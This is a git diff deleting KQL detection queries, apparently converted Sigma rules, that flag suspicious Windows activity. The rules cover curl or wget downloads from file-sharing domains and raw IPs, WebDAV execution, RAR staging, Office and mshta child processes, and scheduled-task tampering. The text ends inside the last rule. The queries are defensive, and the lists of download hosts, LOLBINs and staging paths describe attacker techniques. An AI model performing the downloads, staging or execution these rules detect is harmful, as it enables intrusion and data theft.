diff --git a/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql b/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql
deleted file mode 100644
index c1cea9e1..00000000
--- a/Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Sander Wiebing
-// Date: 2018/11/22
-// Level: medium
-// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
-// Tags: attack.execution, attack.t1059.006
-DeviceProcessEvents
-| where ((ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductVersion =~ "?") or (ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductName =~ "?") or (ProcessVersionInfoCompanyName =~ "?" and ProcessVersionInfoFileDescription =~ "?")) and FolderPath contains "\\Downloads\\"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Created_In_PerfLogs.kql b/Execution/Suspicious_File_Created_In_PerfLogs.kql
deleted file mode 100644
index 45c8e0fb..00000000
--- a/Execution/Suspicious_File_Created_In_PerfLogs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
-// Tags: attack.execution, attack.t1059
-DeviceFileEvents
-| where (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".bin" or FolderPath endswith ".chm" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".py" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") and FolderPath startswith "C:\\PerfLogs\\"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql b/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
deleted file mode 100644
index 99d431f0..00000000
--- a/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
-// Tags: attack.defense_evasion, attack.execution
-DeviceFileEvents
-| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql b/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql
deleted file mode 100644
index 7514d439..00000000
--- a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects potentially suspicious file download from file sharing domains using curl.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains 
"dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io")
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql b/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql
deleted file mode 100644
index bdaf9ef9..00000000
--- a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or 
ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io")
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql b/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql
deleted file mode 100644
index e3c7add6..00000000
--- a/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" 
or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql b/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql
deleted file mode 100644
index 4a82ac5a..00000000
--- a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql b/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql
deleted file mode 100644
index b0c196f8..00000000
--- a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/23
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Help\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\"))
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql b/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql
deleted file mode 100644
index b434440a..00000000
--- a/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/09/01
-// Level: high
-// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " net use http" and ProcessCommandLine contains "& start /b " and ProcessCommandLine contains "\\DavWWWRoot\\") and (ProcessCommandLine contains ".exe " or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".bat " or ProcessCommandLine contains ".vbs " or ProcessCommandLine contains ".ps1 ") and (FolderPath contains "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.EXE")
\ No newline at end of file
diff --git a/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql b/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql
deleted file mode 100644
index 3dac4b9b..00000000
--- a/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/12/15
-// Level: high
-// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rar.exe" or ProcessVersionInfoFileDescription =~ "Command line RAR") or (ProcessCommandLine contains ".exe a " or ProcessCommandLine contains " a -m")) and ((ProcessCommandLine contains " -hp" and ProcessCommandLine contains " -r ") and ((ProcessCommandLine contains " " and ProcessCommandLine contains ":*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\$Recycle.bin\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\PerfLogs\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Temp") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Users\\Public\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Windows\\") or ProcessCommandLine contains " %public%"))
\ No newline at end of file
diff --git a/Execution/Suspicious_HH.EXE_Execution.kql b/Execution/Suspicious_HH.EXE_Execution.kql
deleted file mode 100644
index cd21df94..00000000
--- a/Execution/Suspicious_HH.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Execution/Suspicious_HWP_Sub_Processes.kql b/Execution/Suspicious_HWP_Sub_Processes.kql
deleted file mode 100644
index 7c00588f..00000000
--- a/Execution/Suspicious_HWP_Sub_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/24
-// Level: high
-// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
-// Tags: attack.initial_access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
-DeviceProcessEvents
-| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql b/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql
deleted file mode 100644
index 54c067e6..00000000
--- a/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/07
-// Level: high
-// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
-// Tags: attack.execution, attack.t1059.001
-DeviceFileEvents
-| where FolderPath in~ ("C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive")
\ No newline at end of file
diff --git a/Execution/Suspicious_LOLBIN_AccCheckConsole.kql b/Execution/Suspicious_LOLBIN_AccCheckConsole.kql
deleted file mode 100644
index 83a2f028..00000000
--- a/Execution/Suspicious_LOLBIN_AccCheckConsole.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/06
-// Level: high
-// Description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -window " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\AccCheckConsole.exe" or ProcessVersionInfoOriginalFileName =~ "AccCheckConsole.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_Microsoft_Office_Child_Process.kql b/Execution/Suspicious_Microsoft_Office_Child_Process.kql
deleted file mode 100644
index 255e5e51..00000000
--- a/Execution/Suspicious_Microsoft_Office_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
-// Date: 2018/04/06
-// Level: high
-// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
-// Tags: attack.defense_evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or 
FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\"))
\ No newline at end of file
diff --git a/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql b/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql
deleted file mode 100644
index 37f7d4d5..00000000
--- a/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location
-Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on
-Instead they modify the task after creation to include their malicious payload
-
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /Change " and ProcessCommandLine contains " /TN ") and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "bash " or ProcessCommandLine contains "scrcons" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "forfiles" or ProcessCommandLine contains "scriptrunner" or ProcessCommandLine contains "hh.exe" or ProcessCommandLine contains "hh ") and (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains 
"C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Perflogs\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%")
\ No newline at end of file
diff --git a/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql b/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql
deleted file mode 100644
index 796ce58d..00000000
--- a/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/07/17
-// Level: high
-// Description: Detects suspicious mshta process execution patterns
-// Tags: attack.execution, attack.t1106
-DeviceProcessEvents
-| where ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and ((ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))) or ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and (not(((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\") or (ProcessCommandLine contains ".htm" or ProcessCommandLine contains ".hta") or (ProcessCommandLine endswith "mshta.exe" or ProcessCommandLine endswith "mshta")))))
\ No newline at end of file
diff --git a/Execution/Suspicious_Outlook_Child_Process.kql b/Execution/Suspicious_Outlook_Child_Process.kql
deleted file mode 100644
index 7dd75aaa..00000000
--- a/Execution/Suspicious_Outlook_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
-// Date: 2022/02/28
-// Level: high
-// Description: Detects a suspicious process spawning from an Outlook process.
-// Tags: attack.execution, attack.t1204.002
-DeviceProcessEvents
